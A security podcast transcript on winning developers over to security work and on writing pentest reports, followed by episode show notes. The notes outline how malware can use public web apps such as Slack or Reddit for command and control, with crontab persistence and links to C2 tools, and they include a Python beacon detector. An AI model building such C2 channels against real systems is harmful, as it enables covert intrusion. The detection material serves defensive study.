Yeah. Do you know one? *laughs* So, the lessons learned, you said, language makes all the difference. You know, the way you speak is like, you know, if you only know English, like most Americans, and go over to France, speaking louder in English to somebody who only speaks French is not going to help you. So "look for the helpers." So let's say we're not lucky enough to have somebody like the person you found in your organization. Is it going to take a little bit longer, maybe, to get them onto your side, to, you know, poke at them like that, or, you know, maybe grease the wheels with some donuts, or, you know, maybe take them to lunch or something? Would that be helpful at all?
Brian "Noid" Harden 11:35
Well, first off, yes, you'd be amazed at how much showing up with donuts...
Bryan Brake 11:48
Oh, I know
Brian "Noid" Harden 11:49
Oh yeah. No, actually, it's funny, too, because just a couple of weeks ago another team at my company came over and gave my team donuts.
They gave my team, the IT team and the tech team, donuts because of all the work we've been putting in for... as far as I'm concerned, yeah, I'll march directly into hell for those people right now, because they gave me donuts...
Bryan Brake 11:56
niiiice.
they better be Top Pot donuts or something legit not like...
Brian "Noid" Harden 12:13
Oh, yeah, they were. They were Top Pot donuts. But yeah, so part of it's that. Something else, too, is doing some of the work yourself. So, in addition to all this work I'm doing, I'm also managing the development of security features. And I had gone over the product spec for one of these security features, and I built a data flow diagram. And then during one of my little weekly Scrum meetings where I sit down with my devs, I showed it to them. And I remember one of them, too, he immediately stopped and was like, "What is this?" He's like, "What is this? This doesn't make sense,"
Bryan Brake 12:53
This is forbidden knowledge This is your thing.
Brian "Noid" Harden 12:56
Yeah, you wrote this. Okay, you wrote this, this is just a visual representation of the thing that you wrote. And once I explained it to him, sort of the steps one through eleventy, you know, and showed him what had happened, he was sort of like, "Oh, that's interesting." Still somewhat dismissive of it, but it was still kind of a file. So in addition to, you know, buttering people up with donuts and lunch and things like that, also sometimes you gotta just buckle down and do it yourself, and then show the value. And I mean, I'll be blunt, that's how I've gone through most of my career: when I can't get traction, I'll go do it, and then pop up and go, hey, guys, check this thing out. Oh, wow, that's really neat, how did you do that? Where did you do that? It's like, oh, you can do it too. Right now I can show you how, I can work with you on it. I'm certainly not going to tell you to RTFM and walk out of the room. So part of it is it also shows a little bit of commitment on your part. Sort of one of the things I've picked up, with security not even in the equation here, but just having worked in a lot of software development organizations with the devs and the PMs, is the devs frequently see the PM as not doing anything of value, except for when you are. So when you are willing to put that kind of effort in to deliver something like that, like, hey, I threat modeled our service, it sort of shows this: "Oh, I take it back, all those things I said about you, you know, you're not worthless after all." So there's definitely some value there, too, because a lot of times, too, people are willing to say... because it's easy to stand back and issue edicts, it's easy to stand back and just, you know, get up on your soapbox and tell everybody else what to do. But when you show you're willing to eat your own dog food,
That really gets people's attention, because it's like, "Okay, this dude clearly cares about this a lot. And now that he's done it, I see what he's talking about. Yeah, you know, like, we should do that, there's value here."
Bryan Brake 15:11
So, very cool. Yeah. So on the last slide here, when you wrapped it all up, you said engage early and often... So when we're talking about communication, open communication, trying to... some of it's, you know, cultivating relationships. So you kind of need to, you know, if you're introverted, you kind of need to step out of your shell a little bit and go and talk to people, get out of your cubes for once in a while, turn on the lights, that kind of thing. How often did you talk with these teams to help build this relationship after a while? Because obviously there had to be some team building there.
Brian "Noid" Harden 15:48
Yeah, so in my case, since I was in the team, we talked weekly, okay, weekly, and sometimes daily, because they were literally down the hall from me, right? But in terms of where I've had to work in other organizations, where I've been back in a centralized organization and having to work with remote teams, or work with teams where I'm telling them to do things but I'm not in their org... like a weekly basis, okay, like, we're going to meet up this week. Because, for example, back when I was at Microsoft I worked in the MSRC before I left, yeah, and me and another guy were handling all the Internet Explorer (IE) cases. Okay. That was a lot of cases, because there's a lot of versions, right. So we would go meet with those cats once a week. And we would sit down with them and say, okay, here's the queue. Here's what's new from last time. You know, here's sort of what we think is the priority for fixing things, you know, what do you think about it? But it's that you always want them to know who you are, and you want them to know that you're just as busy as they are, and that you're also respectful of their time, right? You know, so we'd make the meeting short... a personal pet peeve of mine are people that set meetings deliberately long with the expectation of, oh, I'll just go ahead and give everybody 30 minutes back, right? Like, well, thanks, jerk. Like, how about you could have just made a 30 minute meeting in the first place? You know, it just tells me... that doesn't tell me you're a magnanimous person, that tells me you can't manage your time, you know. So I try to be really concise. Like, I'm going to set up a meeting with these devs. I'm going to include the agenda in the meeting invite. I'm going to set it for exactly how long I think... it's like, we're going to have a 30 minute meeting, you know, a 30 minute meeting to go over the bugs that are in the queue.
There's four new ones from last week, one of them's really nasty, you know, that probably is going to be non-negotiable... you know, but the other three are up for negotiation. And you show up, you sit down with them, you know, some pleasantries, and then you just get to work, and then you get them back out doing their thing and you get back to your thing. And that really flows well... It really flows well because, you know, none of us like meetings. And the closer you are to touching computers, the more meetings disrupt your flow, the more they just disrupt your life and the thing that you're effectively getting, usually, paid a lot of money for. And so by kind of doing it that way, you keep that cadence up, you keep that sort of friendship and that rapport up. But the other thing, too, is another point I wanted to make, but I'm getting tired... but yeah, along those lines, too, yeah, you get that rapport there, you're respectful of their time, and then you... I can't remember what I was going to say next.
Bryan Brake 19:20
So the last bit was, let's see, don't talk about security, talk about feature development. We talked about that. Threat modeling with your developers... you and Dr. Cowan, my carpool buddy, you and Crispin need to, you know, get together and talk about the threat modeling he's doing... he doesn't do trust boundaries so much. One of the talks he gave at SeaSec East was about how we do threat modeling in our organization, but a lot of companies are starting to see value in that before we do engagements, because we can prioritize what's the more important thing to test versus just testing all the things in the environment.
Brian "Noid" Harden 19:42
Threat modeling in software development is huge, too. Like, that was one of the things I think a lot of my developers I've done this with over the years have taken away from it: one, you have to make it fun... You can't make it a complete slog. But one of the nice things about threat modeling is, when you're visually looking at the thing you're going to build, that's when you make the realization that, like, oh, hey, my post office has no door... You know, and it's like the best time to figure that out. Then, I always tell people that, yeah, the best time to fix a bug is in alpha, before you write anything... And the next best time to fix it is before it goes into production. And the worst possible time to fix a bug is after it's been in prod for 10 years, and it's a load-bearing bug at this point. It has dependencies on it.
Bryan Brake 20:30
You know what, it's funny you mention that. I've been seeing some, like, Linux kernel bugs; they said there was one in there that was like 15 years old that affected all of, like, 2.6.x up to the latest version. It was a use-after-free bug, you know. I don't know if they found the bug 15 years ago and just never fixed it, but yeah, bugs like that sit in there because people don't check for that kind of stuff...
Brian "Noid" Harden 20:51
That happens sometimes. Well, I mean, God, remember the whole SYN flood thing in the 90s? Yeah, I mean, it was in the RFC... One of those, like, oh, we found the bug. It's like, what? You read the RFC and just finally understood it. You know, so it's that stuff. And there was an SSH bug that popped up recently. Yep. It was the same thing. It wasn't a terribly nasty critical bug, but it was in a piece of code that had been in SSH forever.
Bryan Brake 21:26
Yeah, I seem to remember that one, too. Yeah, I'll have to find a link to that one. So I know you're getting tired. I have one other topic I'd like to discuss, because I do a lot of report writing. Well, I probably should do a lot of report writing, but at Leviathan, you know, we, the PMs, grease the wheels, we, you know, work the relationship, the status meetings, we do the executive summary and such, and I could be better at writing reports; some of our testers are way better at it than I am... You know, taking the whole idea of the language and where things go with this: when we put findings out, we, well, we call them findings, not necessarily bugs. But what I'm trying to figure out is how we can better communicate our reporting when we're doing things like readouts, to, you know, kind of resonate with both developers and management. Because the idea is the executive summary is supposed to be for the "managers" or senior folk, and then we have, like, you know, components that drill down and talk about specifics and be more technical. But, you know, often we find ourselves, and I find myself, because I come from a more technical background, writing more technically to the executives. And my question was, are there ways of communicating risk to both the developers and the managers using somewhat the same language? Or should we call the bug not bugs or not findings? Should we call them, you know, hey, here's a feature you guys should implement, which would be, you know, HTTP... or, you know, you must have seen a few pen test reports in your time. And I mean, what is your opinion of pen test reports?
Brian "Noid" Harden 23:13
So, my opinion of most pen test reports is that they're garbage... Well, they're usually written to one extreme or the other. So, unfortunately, I have yet to find any really good language that appeases everybody.
Brian Boettcher 23:30
So what's the one extreme or the other?
Brian "Noid" Harden 23:32
What are the two extremes? They're either hyper-technical, the sort of stuff that, like, any of the three of us would probably look at and go, okay, I get it, right, I understand the value here. Or they're so high level that, if I'm a business person, I might be sitting there going, hey, okay, you know, you've reached out, you've touched my heart, I understand that this is a critical, like, this is a big issue we need to get fixed. But there's not enough meat there that if I took that report and handed it off to my dev lead and said, go fix this, the dev lead is going to sit there and go...
Brian Boettcher 24:09
Are you kidding me?
Brian "Noid" Harden 24:10
Yeah. Like, I don't know what to fix. According to this report, it says bad things can happen on the network. Are you telling me to go prevent bad things from happening on the network? So that's the thing. I find that, yeah, they either overwhelm you with details or there's not enough substance to them. Okay, so every once in a while you get a really good one, though. You get a really good one. If I could, just a shout out to Coalfire, actually, I like their reports.
Unknown 24:39
I mean, okay. So, what is a happy medium type report for you? One that would satisfy the manager folks but also, you know, be technical enough. What kind of things would you like to see in reports that you get from them? And feel free to, you know, talk about the Coalfire thing, I guess.
Brian "Noid" Harden 25:02
*Chuckles*
Bryan Brake 25:06
*Chuckles* We're always trying to improve our reports at Leviathan. We've gone through and done things like test evaluations and, you know, things like that. And no, it's fine, you know, they're cool with me doing my podcast on the side. So, but when you get reports... the good ones... what do they look like? Well, I mean, what kind of things are you looking for in a proper pentest report?
Brian "Noid" Harden 25:30
Well, for me, being a technical person, one of the things... the biggest thing I'm looking for in a report is repro steps, right? If you haven't given me clear repro steps, then you have given me a useless report. And that's the thing, I've seen reports where basically it's, you know, hey man, we popped your domain controller, we did this, we did that, look at how freaking awesome we are... And you're like, okay, I didn't hire you guys to be a circus sideshow. I hired you guys to show me where my risk is, so I know where to focus my efforts. And so those types of "look at how badass I am" reports don't do anything for me. What I do like are reports that say, hey, you know, we found a cross-site scripting vulnerability on this particular product in this particular area, and here are not only screenshots of the cross-site scripting vulnerability happening, but here are the repro steps. Because what's going to happen is, for example, I see something like that and I go, well, we've got to fix that. I'm going to go to my developers, and the first thing my developers are going to ask me is, can you repro it? Because one of the things they're going to do after they fix it is validate the fix, and if they don't know how it was exploited in the first place, they're not going to know how to validate the fix. So being able to provide that information is huge for me. But then again, I'm also not, you know, the business guy, I'm not the big money guy. I want my report to be technical, right? So would the executives of my company get the same value out of the report? Probably not. You know, when you're talking to the much higher-level, non-technical people, what you need to be doing is making sure you're talking in terms of risk. Sure, you know, you're talking in terms of risk, and you're talking in terms of a non-technical risk...
You know, at the end of the day, the CEO of the company doesn't give a damn that SMBv1 is still on the network, right? They might not even know what that is. Odds are, I'm gonna go out and say they probably don't know what that is. And even then, that doesn't mean explain to them what it is, because they're not going to care. So first we're going to go from not knowing what it is to not caring what it is. But if you express things in terms of the risk of that, you know, the current network architecture, as it stands, is very fragile and could be easily brought down, you know, through potentially accidental behavior, let alone malicious behavior, resulting in outages and SLA violations, now you've got their attention, because what they hear there is: if I don't fix this, it might cost me money.
Brian Boettcher 28:36
Profit loss.
Brian "Noid" Harden 28:37
Yeah, and that's the thing. It's, you know, depending on where they're at in the org structure... I've been in plenty of organizations before where downtime is bad. Downtime is never good. But I mean, I've been in organizations where it's like, okay, so I just got promoted to, like, super uber director guy, 48 hours into the gig, you know, we had like a two-hour outage... I'm done.
Bryan Brake 29:08
Busted that SLA, big money...
Brian "Noid" Harden 29:10
Even though I had nothing to do with it, I'm the accountable one. So, yeah, you need to be able to express things in terms that translate. You know, like one of the things, back when I used to be a consultant, one of the things I always asked the executive types I'd meet on jobs is, what keeps you up at night? You know, don't worry about what I'm concerned about, what are you concerned about? Because they might be the same thing; I'm just going to talk to you about it using the words that you care for and understand. Because I see a lot of technical people try to describe risk to non-technical people, and they do it by being highly technical, and when it's not being understood, they fall back to being even more... they take the approach of being in France, not speaking French, so I'm going to speak slower and louder, right? And at the end of the day, they're just going to keep shaking their heads going, man, this guy really wants to express something to me.
Bryan Brake 30:18
Yeah, something must be really important...
Brian "Noid" Harden 30:20
...to be agitated by it. I don't know what it is...
Bryan Brake 30:23
Great, now it's blue monkey poo. I don't know what's going on.
Brian "Noid" Harden 30:26
Yeah, so that's it. So yeah, when you're talking to leadership, express things in terms of contract violations, SLA violations, financial impact, right? You know, like one of the things I liked when PCI came out and they had these ridiculous up to $10,000 per bit of PII that gets disclosed, and then you explain to a room full of high-level people that if blank were to happen, 40,000 bits of PII would be exposed, and, you know, I'm not so good at math but my calculator here tells me at $10,000 a pop... and you watch the people in the room get real quiet...
Bryan Brake 31:10
Oh yeah, no, now you know. The thing is, you just haven't seen a Leviathan one yet, so, you know, if you want to, reach out to us, we'll do a pentest for you. We don't mind coming out and hanging out, doing pentests for you, so...
Brian "Noid" Harden 31:24
Frank's a good friend, solid, solid human being.
Bryan Brake 31:26
No, I mean, we'll take your money and we'll give you a good drubbing, up and down, left and right. We'll make it hurt. So anyway, actually, yeah, we might need to talk about that a little bit later. I would not hate on that. I get money when people come in, it's new business. So yeah, I wouldn't hate on that at all.
Brian Boettcher 31:47
I liked, in your last phrase or last sentence in your presentation: if you can, avoid even using the word security. I think that's a good summary of what we talked about.
Bryan Brake 32:00
Yeah, that got me too. I was like, wow, okay. So it's like the buzzword you're not supposed to say, or, you know, like, you get a shock...
Brian "Noid" Harden 32:08
Treat it like a game. Yeah, treat it like a game. But you'd be amazed, it works...
Bryan Brake 32:16
Hundred percent of the time. It works every time?
Brian "Noid" Harden 32:18
Yeah, a hundred percent of the time, works every time. But, you know, it definitely works because there are people... because there's conditioning, right. The history between security people and software developers is deep and it goes back...
Bryan Brake 32:33
It's contentious.
Brian "Noid" Harden 32:34
It's contentious at times. And, you know, obviously you try to be a good human being, trying to better the world around you. You know, whenever you go somewhere, try to leave it in a better condition than you found it. But also understand that the person who may have been there before you may have just straight up f'ed the place up.
Brian Boettcher 32:58
Scorched earth.
Brian "Noid" Harden 32:59
Yep, yeah. And sometimes, I mean, I've rolled into organizations before where it's like, why are these people so mad at me? I just got here... And it's like, oh, because the guy you replaced just got off. And it sucks, because it's not fair that you have to rebuild those damaged relationships when you didn't damage them. But life ain't fair.
Bryan Brake 33:22
Yep. Well, you know what, the whole, you know, DevOps and those things, that was the Elysian Fields for developers, like, oh, I can go do anything and enjoy everything, and then it's like, you know, we're the "no" department, we're the ones who are going to put manacles on them. So, you know, security folks have got to learn to be flexible, compliance folks can't wield their hammer anymore like they should, if they want to, you know, play with the developers and the DevOps and the management folks. We talked about this with Liz Rice a couple weeks ago about getting, you know, security into the DevOps area, and it's like, one, we've got to learn to be flexible, we've got to help them understand that. Now, yeah, the bug/feature stuff, if I'd heard this when we were talking to her, I'm almost certain she would agree with us on the fact that, you know, we can't treat security like security; we have to treat it as a feature enhancement in this case.
Brian "Noid" Harden 34:16
It is a feature, you know, it is a feature, and it increases the stability of the product, which increases the customer base of the product, right? It has all the same things to it that any other feature would. But yeah, as far as security being the "no" department thing, something else is, like, I still run into security people that look at themselves as the "No" department, that kind of pride themselves on it. Yeah, and when you find those people, just call them out. I mean, just tell them, like, look man, that doesn't work. It's never worked. Stop it now. Because when you're viewed as the "no" department, no one will ever want to work with you. Why would you want to?
Bryan Brake 34:57
Yep... you're a non-starter
Brian "Noid" Harden 34:59
Yeah, because that was a bit of career advice I got at one point: basically, be solutions-focused. You know, basically you're not going to go anywhere if you're the person who's calling out the problem, and you might be calling out the problem more articulately than anybody else in the room, you might have a better understanding of the scope and the depth of the problem, but there is a whole class of manager out there that will just be like, man, that Noid guy, nothing but problems. Whereas if you instead, you know, focus not really on the problem but rather on the solution... "be solutions-oriented," to sound like a business guy for a second. And it's like, yeah, be that solutions-oriented person, and especially if you can do it with a sort of positive spin. Like, I had a boss at one point; I would stop in his office pissed off every once in a while, and I'd just be like, this is screwed up and that's screwed up and blah, blah, blah. And he'd stop and go, "leave my office now and come back in and restate everything you just said, but in a positive way." I'd go sit in the hallway for a few minutes, then I'd come back and I'd be like, okay, we have an opportunity here. And I tell you, I hated him for it. But damn if it didn't work.
Bryan Brake 36:32
Oh god. Yeah, that would make complete sense. Yeah, coming in with a positive instead of a negative.
Brian "Noid" Harden 36:40
So that's the thing. It's like, yeah, even when your negativity is spot on and accurate, there are a lot of people that are like, "ugh, that person is always negative." And then sure enough, yeah, you start focusing on, like, oh, you're the positive, solutions-oriented guy, even while you're telling them that basically we're all going to hell, but I'm doing it in a positive, solutions-oriented manner, and you'd be amazed how much traction you get.
Bryan Brake 37:06
Mr. Boettcher, do you have any other thoughts or questions? I want to let Mr. Noid go, cuz he's getting a little ty-ty, he's a bit sleepy and he needs to go to bed...
Brian Boettcher 37:15
There's a lot of great tidbits in here. I'm gonna have to listen to it again and get all of them. And again, there's a lot of Manager Tools references here, and Manager Tools, if you're not a manager, that's okay. It's not just for managers; all that stuff they talk about is really valuable to all employees.
Brian "Noid" Harden 37:39
What's it called, the Manager Tools podcast?
Bryan Brake 37:42
Yep. It's been going on for 12 years.
Brian Boettcher 37:45
Since 2006
Bryan Brake 37:46
Yeah, something like that. It's very big. We put a link to the three types of power and one to rule them all in the show notes as well. So yeah, go listen to that. I listened to that; it's one of my regular non-infosec podcasts that I listen to. I listen to it every Monday morning when I'm on the treadmill at the gym. So yeah, really excellent stuff. If you're out there and, you know, yeah, I mean, it'll help you kind of understand, but if you're out there and you're not a manager yet, it might help you understand where your manager's coming from, too.
All right. Mr. Noid, how would people get a hold of you if they wanted to maybe have you for more podcast appearances or, you know, speaking engagements or whatever? Are you going to be speaking anywhere soon?
Brian "Noid" Harden 38:39
Am I? I don't know. No, I don't think I am, right. Sorry. Are you going anywhere? So... question? I am, there you go. I am speaking soon. Yeah, I'm speaking at the NCC Group Open Forum. Oh, that's right. That's next weekend. I don't think it's actually been announced yet. Okay. I mean, it's cool for me to talk about it. But yes, it's...
Bryan Brake 39:02
The 12th (of March).
Yeah, it is the 12th, in Fremont, so if you're outside of the Seattle area you're going to be SOL...
Yeah, they don't record that.
Brian "Noid" Harden 39:15
But I'm going to be giving basically the abbreviated version of my BSides talk. They had an empty slot they needed to fill, and they basically said, could you do it? I said sure, and then they said it's 30 minutes long, and I'm like, well, my talk's an hour, but we'll make it work... I think they're at Tableau up in Fremont...
Bryan Brake 39:37
Yeah, I'm on that list and, yeah, I know Ms. Crowell over there, who's one of the senior managers at NCC, she's a great lady... she's actually not running it; she used to run it and gave it to somebody else, but she still helps out when she can. But yeah, really great quarterly open forum that NCC Group puts on. Plus they put out a nice spread for dinner, certainly good.
Brian "Noid" Harden 40:00
I haven't been to one in a while, but they're usually a lot of fun. The last one of those I went to was a TLS 1.3 one.
Bryan Brake 40:09
I was at that one too.
Brian "Noid" Harden 40:10
That worked out great, because literally the following weekend I spoke at DC206 about TLS 1.2, right? And I ended up getting Joe to come along and speak about TLS 1.3 in a much more authoritative manner than I could have. It's badass.
Bryan Brake 40:24
Yeah, Joe. Joe was on the steering committee for that.
Brian "Noid" Harden 40:28
Yep. Yeah, I think... but yeah, that was also nice. He kept me honest while I was giving my talk. I'd periodically just look at him and he'd kind of nod: I'm not going into the weeds yet. But yeah, as far as getting a hold of me goes, the best way to do it is I'm on Twitter @_noid_ or you can email me at [email protected]
Bryan Brake 40:52
Yeah, so yeah, if you're in the Seattle area, the downtown Seattle area or the Fremont area, that's a really nice place. I think parking was at a premium the last time we were there.
Brian "Noid" Harden 40:52
It's Fremont, parking is always at a premium
Bryan Brake 40:52
They're dodging bikes or whatever, like motorized bicycles or whatever, so you know...
Brian Boettcher 40:52
Scooters now.
Bryan Brake 40:52
Yeah, I mean, the Fremont area, they're really weird about their bicycle laws and stuff up there, so...
Brian "Noid" Harden 41:07
...and zoned parking, so watch where you park, too.
Bryan Brake 41:32
I'm going to get Ms. Berlin, because, you know, she's got a lot going on, she's, you know, heading up the mental health hackers group... you can find her...
Was it hacker... god, I hate this, um... she's @infosystir on Twitter. Hackers Mental Health is her nonprofit. She's running that and you can find that @hackershealth on Twitter. She will come to your convention or conference and do a village. And, you know, it's a nice chill area you can go to, if you're interested in doing that.
Brian "Noid" Harden 42:12
...is truly doing the Lord's work, too.
Bryan Brake 42:14
Yes, she is. And we're very proud of her for all that she's doing. So yeah, her and Megan Roddy, who's also one of our Slack moderators... So speaking of our Slack, we have a very active Slack community. We just, like I said, we have "JB," who was promoted to moderator because it's been far too long, and he's been doing the European and Asia book club, and he should have been a moderator for a while, so we did that today, gave him access to our secret moderator channel and such. But yeah, we have a social contract; you can join us by emailing [email protected] or hitting our Twitter, which is the podcast Twitter @brakesec, and you can follow me on Twitter @bryanbrake. Mr. Boettcher, you've got a lot going on too, sir. How would people find you if they wanted to talk about the Log-MD stuff?
Brian Boettcher 43:10
Yeah, you just go to log-MD.com... Don't forget the dash, right? Otherwise you'll... you'll get some... well, never mind...
Bryan Brake 43:20
Is it like WhiteHouse.com? *laughs* That's an old joke, kids!
Brian Boettcher 43:26
I'd like to say, though, if you do go buy your developers donuts, or whoever, don't eat any between the pickup and the drop-off, right? Because then you'll show up with four donuts and they'll be like, oh thanks, great, there's 10 of us and you bring us four donuts.
Bryan Brake 43:41
[imitating Forrest Gump] "I had some, sorry." Don't do that, yeah.
Yeah, buy 13 donuts and then eat one for yourself and then say you got a dozen. So you're making an appearance; you're going to be at BSides Austin at the end of the month, along with Ms. Berlin, who's going to be at that one as well, I think?
Brian Boettcher 44:00
I am... Megan's going to be there, I'm not sure. Very cool, that's her home base, so we'll see. Nice. Yeah, and the classes are cheap. I don't know if they're sold out yet, but it's like $100 bucks.
Bryan Brake 44:13
Okay, awesome. Cool. Before we go, we have a store. If you want to go buy a T-shirt with the Brakeing Down Security logo, you know, you can definitely go do that, or get one with Ms. Berlin's face on it, which is very weird but still very cool. I'm probably going to buy a pink one here in the next few weeks. And thank you to our patrons, people who help support the podcast by donating some money; it helps pay for hosting, pays for the time that we're doing this. Also, we're looking into adding some possible transcription services. We've gotten a couple of emails from people who are saying they want to get transcriptions of us saying "uh, um, ah" a lot. So actually, it was a gentleman by the name of Willie, I think, who said he had hearing difficulties, so he wanted to know if we had a transcription of the podcast, and I feel really bad because I'm like, I don't know how to reply to him and say, you know, we're just a little mom-and-pop shop here. So we're looking at transcription services, maybe something like Mechanical Turk, or there was one called otter.ai that we're looking at, to maybe kind of make it better for people to hear these things.
Brian "Noid" Harden 45:26
I actually suffer from degenerative hearing loss. I'm slowly going deaf myself.
Bryan Brake 45:31
I've got tinnitus from the Navy.
Brian "Noid" Harden 45:32
Same here. It's permanent and ongoing. And just, yeah, it's like, I feel for him. Yep. And hopefully transcriptions will be a thing at some point. Yeah, gods, I hope so. Yeah, I mean, other than the "uhs" and "ums" about 800 times during the podcast, I apologize for that. But yeah, so we're trying to look into that. If we can make it work, we will; we will do our utmost to make the podcast as available as possible to everybody. So it may end up being that we have to hire somebody who'll do it for us. So that may be another thing, which means we'll need more Patreon money, you know, that kind of thing. So if you're interested in getting full transcripts, we may make that possible if we can get another maybe 20 to 30 people at 20-30 bucks a month. But we do appreciate the tips; you know, we call them tips because you're helping to support the podcast and helping us get this out. And yeah, so for Ms. Berlin, who's not here, sadly, and she's going to be kicking herself because this was a really awesome podcast, and Mr. Boettcher, this is Brakeing Down Security from our world headquarters here in Seattle. Have a great week. Be nice to one another. Please take care of yourselves, because you're the only you you have, and we'll talk again soon.
Brian Boettcher 46:45
Bye bye
Brian "Noid" Harden 46:46
Bye Internet people.
Transcribed by https://otter.ai
Published on: March 24, 2019
Shout-out to Thomas…
Tried to meetup while at SEA comic-con
Patreon
Log-MD
Hacker’s Health - Ms. Roddie is at TROOPERS (Ms. Berlin?)
4 podcasts?
SpecterOps Training / workshopCon - https://www.workshopcon.com/events
Zach Ruble- @sendrublez
C2 infra using Public WebApps
TARCE - Teaching Assistant RCE(?) - they run your code every week, don’t check for backdoors before running it...
C2 Basics
Local HTTPd server (bashfile)
Python scrapes web server
3 components:
-Servers
-Communication channels
-Malware and client
3 Requirements of a C2:
-Victim receives commands
-Victim executes them
-Victim sends results back
Web server serving a static file
Malware on machine scraping site with python requests and executing it as commands.
Crontab @reboot
State change = change the text field
Long haul/short haul server
Long haul - regain persistence
Short haul - sends commands to victims
Slack as C2 - Blends in to the Env
Send and receive messages
Using Real Time Messaging API
https://3xpl01tc0d3r.blogspot.com/2018/06/how-to-use-slack-as-c2-sever.html
https://link.springer.com/chapter/10.1007/978-3-319-27137-8_24
https://glitch.com/
https://github.com/bkup/SlackShell
Reddit as a C2
“Reddit Rising”
Glitch.com
Serverless platform
Using Google search results as
Would Google Algos see odd behavior of hundreds of hosts searching for the same thing?
Log file analysis?
How can we protect against this?
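The C2 sketched above is a client that fetches one static page on a fixed schedule (cron @reboot to start it, a sleep loop after that) and runs whatever text it finds, with the operator "changing state" by editing that text. Two things follow for the defender doing the log file analysis asked about in the last bullets: the client hits the same host and path at nearly constant intervals, and the response size only changes when a new command is posted. The following is an added example written for these notes (not code from the episode or its guest) that groups proxy log entries by (client, host, path), measures how regular the gaps between requests are, and flags groups too regular to be a person or a browser. The log format (timestamp, source, host, path, status, bytes), every log line, and the thresholds are constructed assumptions for the example; the beaconing client in the sample polls once a minute with a few seconds of jitter.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy log (not real traffic). Fields:
# timestamp src_ip host path status bytes
# 10.0.0.7 polls /status.txt every ~60 s; the size changes once (new command).
# 10.0.0.9 is ordinary browsing with irregular gaps.
SAMPLE_LOG = """\
2019-03-20T09:00:00 10.0.0.7 notes.example /status.txt 200 42
2019-03-20T09:00:05 10.0.0.9 cdn.example /app.js 200 31870
2019-03-20T09:00:10 10.0.0.9 cdn.example /app.js 304 0
2019-03-20T09:00:12 10.0.0.9 news.example / 200 88213
2019-03-20T09:01:01 10.0.0.7 notes.example /status.txt 200 42
2019-03-20T09:01:59 10.0.0.7 notes.example /status.txt 200 42
2019-03-20T09:02:20 10.0.0.9 cdn.example /app.js 304 0
2019-03-20T09:02:32 10.0.0.9 cdn.example /app.js 304 0
2019-03-20T09:03:00 10.0.0.7 notes.example /status.txt 200 57
2019-03-20T09:04:02 10.0.0.7 notes.example /status.txt 200 57
2019-03-20T09:04:58 10.0.0.7 notes.example /status.txt 200 42
2019-03-20T09:06:00 10.0.0.7 notes.example /status.txt 200 42
2019-03-20T09:07:01 10.0.0.7 notes.example /status.txt 200 42
2019-03-20T09:09:12 10.0.0.9 cdn.example /app.js 304 0
2019-03-20T09:09:45 10.0.0.9 cdn.example /app.js 304 0
2019-03-20T09:10:03 10.0.0.9 news.example /story/17 200 64002
"""


def parse_log(text):
    """Yield (timestamp, src, host, path, bytes) from the constructed format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, host, path, _status, size = line.split()
        yield datetime.fromisoformat(ts), src, host, path, int(size)


def find_beacons(text, min_hits=5, max_cv=0.10):
    """Return (src, host, path) groups whose request gaps are suspiciously regular.

    cv is the coefficient of variation of the inter-request gaps (stdev / mean).
    A human, or a browser revalidating a cached asset, scatters widely; a
    sleep() loop with a little jitter does not. min_hits avoids judging a
    handful of requests.
    """
    groups = defaultdict(list)
    for ts, src, host, path, size in parse_log(text):
        groups[(src, host, path)].append((ts, size))

    findings = []
    for (src, host, path), hits in groups.items():
        if len(hits) < min_hits:
            continue
        hits.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:
            findings.append({
                "src": src, "host": host, "path": path,
                "hits": len(hits),
                "mean_gap_s": round(avg, 1),
                "cv": round(cv, 3),
                # A static command file only changes size when the operator
                # posts a new command, so many polls with few distinct sizes
                # matches the "change the text field" design above.
                "distinct_sizes": len({size for _, size in hits}),
            })
    return sorted(findings, key=lambda f: f["cv"])


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

Keying the same grouping on (host, path) alone, and counting distinct sources per key, answers the other question in the notes: hundreds of internal hosts all fetching one obscure page (or running one identical search) stands out even when each host's own cadence is hidden by jitter. Slack- or Reddit-hosted C2 defeats the host-reputation angle, which is why the cadence and size features matter more than the destination.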
C2 News (If we go short) :
https://www.zdnet.com/article/outlaws-shellbot-infects-servers-for-monero-mining
Automating OSINT
https://twitter.com/jms_dot_py
http://www.automatingosint.com/blog/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 18, 2019
Log-MD story (quick one) (you’ll like this one, Mr. Boettcher)
SeaSec East meetup
"Gabe"
New Slack Moderator (@cherokeeJB)
Shoutout to “Jerry G”
Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407
www.Workshopcon.com/events and that we're looking for BlueTeam trainers please
Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet
Noid - @_noid_
Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3
Slides (PDF)
Security view was a bit myopic?
“What do we win by playing?”
Cultivating relationships (buy lunch, donuts, etc)
Writing reports
Communicating findings that resonate with developers and management
Often pentest reports are seen by various facets of folks
Many levels of competency (incompetent -> super dev/sec)
Communicating risk? Making bugs make sense to everyone…
The three types of power:
https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1
